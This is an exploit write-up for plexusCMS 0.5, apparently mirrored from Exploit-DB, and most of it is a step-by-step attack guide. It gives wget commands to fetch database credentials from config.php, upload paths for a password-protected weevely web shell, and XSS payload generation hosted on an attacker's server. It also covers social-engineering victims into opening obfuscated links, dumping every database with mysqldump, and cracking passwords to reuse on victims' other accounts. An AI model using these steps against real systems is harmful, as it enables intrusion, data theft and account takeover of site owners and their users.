plexusCMS 0.5 – Cross-Site Scripting / Remote Shell / Credentials Leak

  • 作者: neglomaniac
    日期: 2014-03-31
  • 类别:
  • 来源:
  • # Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
    # Google Dork: allinurl: plx-storage
    # Date: 22.02.2013
    # Exploit Author: neglomaniac
    # Vendor Homepage:
    # Version: 0.5
    backdoor.php	simple commend execute backdoor
    commands.txt	list of useful commands for owning remote box	create important files with given parameters
    phpinfo.php	simple phpinfo call for testing
    plexus05.tgz	original plexus source code for auditing	send evil POST Request for file upload
    readme.txt	nothing else than this file
    request.txt	evil POST request template for
    weevely.php	weevely shell with password:secret
    weevely.tgz	weevely stealth web backdoor client and generator
    Get database credentials with wget http://RHOST/plx-file/config.php
    Try to log in with phpmyadmin and dump the database for password
    cracking. If you can crack the password you can upload php files
    with new image and new file. You can launch your php backdoors
    inside http://plexushost/plx-storage/files/ or plx-storage/images/
    If you do not have access to the database in some way you can
    upload files with XSS and Social Engineering.
    Set up a server with php support and python installed on it. Copy
    all this files to a location where you can write to it. Launch
    python plexushost 80 http://yourserver/scripts/ weevely.php
    If you see: plximage.php, plximage.js, plximage.xss generated!!!
    all files are generated for exploitation.
    plexushost is the victim webserver where plexus is installed
    port is the standard webserver port
    http://yourserver/scripts/ is the location of exploit files. Do not forget
    the slash at the end!!!
    weevely.php ist the file uploaded at http://victimhost/plx-storage/files/
    Get url from plximage.xss obfuscate, iframe and/or shorten it. Put it into
    an email, on a webpage or wherever you want.
    Socialengineer your victim to open this url. If your victim is logged in
    you get your backdoor at: http://victimhost/plx-storage/files/ Else you
    need to socialengineer your victim to log in. After the victim logs in you
    get your backdoor at files directory.
    Connect to your backdoor with weevely and password your password (secret)
    python http://victimhost/plx-storage/files/yourfile.php secret
    Dumpt the whole database with previous collected credential and download ist
    mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
    wget http://RHOST/plx-storage/files/plxinfo.txt
    Crack password and use it for your next hacking attempts against your victim.
    For example try this password for root or other users, other mysql databases,
    mysql root, facebook/twitter accounts and so on.
    Exploit-DB Mirror: